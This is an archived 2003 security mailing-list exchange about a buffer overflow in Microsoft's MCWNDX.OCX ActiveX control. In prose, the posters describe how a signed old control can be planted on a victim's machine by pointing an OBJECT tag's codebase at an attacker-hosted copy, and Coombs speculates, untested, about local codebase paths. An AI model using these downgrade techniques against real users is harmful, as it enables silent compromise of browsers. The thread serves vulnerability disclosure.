[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow
- To: "Thor Larholm" <thor@pivx.com>, "Tri Huynh" <trihuynh@zeeup.com>, <bugtraq@securityfocus.com>
- Subject: RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow
- From: "Jason Coombs" <jasonc@science.org>
- Date: Wed, 13 Aug 2003 09:36:25 -1000
What about pointing the OBJECT tag codebase to a known, or probable, location
on the victim's own hard drive?
ActiveX never implemented any type of "same origin policy" the way JavaScript
does, so a local codebase reference should work as a technique to silently
activate any Microsoft-signed ActiveX control.
But I could be mistaken, this is commentary from memory not experimental
result.
I'd much rather spend my time conducting security audits of Linux and trying
to help those companies threatened by SCO's copyright claims defend themselves
in court.
Jason Coombs
jasonc@science.org
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of Thor Larholm
Sent: Wednesday, August 13, 2003 8:22 AM
To: Tri Huynh; bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer
overflow
The MCWNDX.OCX binary is digitally signed by Microsoft, and as such you can
plant it on the users machine just by pointing the codebase attribute of your
OBJECT tag to an archived copy of the file on your own server.
This also applies to other outdated ActiveX controls, even when a newer
(patched) version exists and is installed on the users machine you can still
re-introduce the old, buggy version since it is digitally signed by Microsoft.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html